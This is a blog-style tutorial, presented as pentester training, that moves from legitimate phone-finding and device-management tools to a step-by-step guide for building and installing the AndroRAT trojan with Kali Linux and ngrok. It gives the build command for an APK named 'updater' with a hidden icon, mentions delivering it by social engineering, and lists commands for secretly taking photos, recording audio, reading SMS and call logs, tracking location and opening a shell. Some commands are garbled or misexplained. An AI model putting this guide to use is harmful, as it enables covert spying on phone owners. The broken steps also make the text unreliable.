Remotely controlling your phone can be useful in various situations, such as when you’ve lost your device, it’s been stolen, or you need to access certain functions or files while you’re away. There are a number of reasons why you might need to use remote phone access sometimes. Find My Device/App: Many smartphone platforms offer built-in tracking and remote control features. For example, Find My iPhone for iOS devices, Find My Device for Android devices, and Find My Mobile for Samsung devices allow you to track your phone’s location, remotely lock or wipe it, and play a sound to help you find it. There are many different ways to remotely control your phone. We have already talked about the best mobile spies. They have rich functionality, but all of them are paid. On the other hand, they work as an intermediary, ie. all phone activity information is not stored on you, but on the server of the mobile spy developer.
They will only provide convenient access to the received information using the control panel on their site. Mobile Device Management (MDM) solutions: Mobile device management solutions are commonly used in enterprise environments to manage multiple devices remotely. These solutions, such as Microsoft Intune or VMware Workspace ONE, provide remote management, data wipe, application management, and device tracking. Manufacturer-specific solutions: Some smartphone manufacturers offer their own remote control solutions. For example, Samsung’s SmartThings app allows you to remotely control compatible Samsung devices, including locking/unlocking, managing device settings, and controlling smart home devices. It’s important to note that remote control capabilities may vary depending on your device, operating system, and the specific apps you choose. Additionally, for security reasons, it is recommended that you enable two-factor authentication, use strong passwords, and update your device software to protect against unauthorized access.
Today I am going to discuss a free way to remotely control your phone using AndroRAT and Kali Linux. The article is written with an educational purpose for training pentesters (white hackers). Our personal devices were used to demonstrate the work. Using such tools on other people’s devices without proper permission is illegal and considered a criminal offense. Neither the editors of hackyourmom.com nor the author are responsible for your actions.
Install Android on Kali Linux.
Install and configure ngrok.
Build payload (executable .apk file).
Install the apk file on the target device.
What is AndroRAT?
AndroRAT (Remote Access Tool/Trojan. AndroRAT) is designed for remote control of an Android phone. It is a client-server application developed in Java Android for the client side, and the backend is written in Python.
The tool will work on Android 4.1 (Jellybean), Android 9 (Oreo), (API 16 to API 28) devices. This RAT can be installed on Android 10 and above, but some commands to get information will work erratically.
Features of AndroRAT:
Backdoor (automatic connection).
Invisible icon after installation.
Uses minimal device resources.
Automatic start after restarting the smartphone.
Ability to take pictures from both cameras
Audio recording from the microphone.
View call and SMS logs.
Get your current location.
Information about the SIM card, IP address and MAC address of the device.
I also recommend paying attention to another tool for remote control of the phone – L3MON
Android requires Python3 to run. To install Python3 on Kali, use the command:
sudo apt install python3 python3-pip
Now you need to install Java OpenJDK 8 on Kali Linux.
The next step of cloning (installing) AndroRAT on Kali:
git branch https://github.com/karma9874/AndroRAT
Go to the AndroRAT directory using the mv command:
Go to the AndroRAT:
We install AndroRAT dependencies:
pip3 install -r requirements.txt
After that you need to install ngrok and set the ngrok authentication token.
To create an APK file, you need to execute the command:
python3 androRAT.py –build –ngrok -p 8888 -o ~/Desktop/updater.apk
The –build argument used in the command uses the androRAT.py python script and builds the payload (.apk file). The -ngrok argument is used to connect remotely via ngrok.
On a local network, you can use ngrok and run the command with the -i option. After that, a listener will be started, waiting for a return connection.
To select an application icon, you can use the –icon argument. In my case, I want to get hidden remote access to the smartphone, so I skip this setting.
The -o option is responsible for selecting the port and location of the .apk file.
In the screenshot above, we can see that AndroRAT creates and signs the .apk file. After the file is created, a listener will be started waiting for a connection:
Now you can send the apk file to your smartphone. If you don’t have physical access to the device, then social engineering techniques can be applied. But keep in mind it’s illegal if you don’t have written permission to conduct a pentest.
For example, install AndroRAT on your personal tablet. After installing the file on the target device, you will see the following message in the Kali terminal:
The connection is established. Now we will use commands to interact with the program:
deviceInfo – basic information about the device.
camList – camera ID.
takepic [camera ID] – a picture from the camera.
startVideo [Camera ID] – record video.
stopVideo — Stop video recording and open the video file.
startAudio — sound recording.
stopAudio — Stop audio recording.
getSMS [inbox|sent] – incoming / sent SMS.
getCallLogs – call history.
shell – start the sh shell.
vibrate [number of times] — vibration.
getLocation — device location.
getIP — ip devices.
getSimDetails – information about all sim cards.
clear – clears the screen.
getClipData – data from the clipboard.
getMACAddress — mac address of the device.
exit – exit.
For example, to receive all SMS, run the getSMS command::
takepic [camera number]
Note that if the phone is in power saving mode, the payload will not be able to connect. Some commands on Android version 11 and above may work unstable.
This is how we can remotely control or monitor Android phone on Kali Linux. I hope the article was useful.